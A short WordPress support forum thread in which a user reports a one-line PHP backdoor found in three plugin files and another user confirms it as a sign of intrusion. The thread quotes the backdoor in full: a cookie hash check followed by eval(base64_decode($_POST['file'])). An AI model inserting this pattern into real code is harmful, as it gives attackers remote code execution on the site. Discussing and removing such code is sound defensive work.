Found new code in plugins (4 posts)

  1. boscardin
    Posted 8 years ago #

    I'm not sure if I should be worried or not, but in three of my plugin files:

    Show Top Commentators

    I found this piece of code on the first line:

    if(md5($_COOKIE['_wp_debugger'])=="c627e39dbb32136efdfcc397575b5f77"){ eval(base64_decode($_POST['file'])); exit; }

    The hash numbers and letters are different for each file, but everything else is the same. The interesting thing is that those plugin files are NOT CHMOD'ed to 777. Akismet is 775 and the other two are 664.

    Should I be concerned?

  2. mechx1
    Posted 8 years ago #

    Yes, this appears to be a sign of an intrusion.
    See this thread
    You can also search on md5($_COOKIE to learn more

  3. boscardin
    Posted 8 years ago #

    Oh okay, thanks for that. I searched by "wp_debugger" and didn't find anything.

  4. mechx1
    Posted 8 years ago #

    That's not always the name of the cookie. Can I assume that you have deleted this code from those plugins and searched your php files for more occurances?

Topic Closed

This topic has been closed to new replies.

About this Topic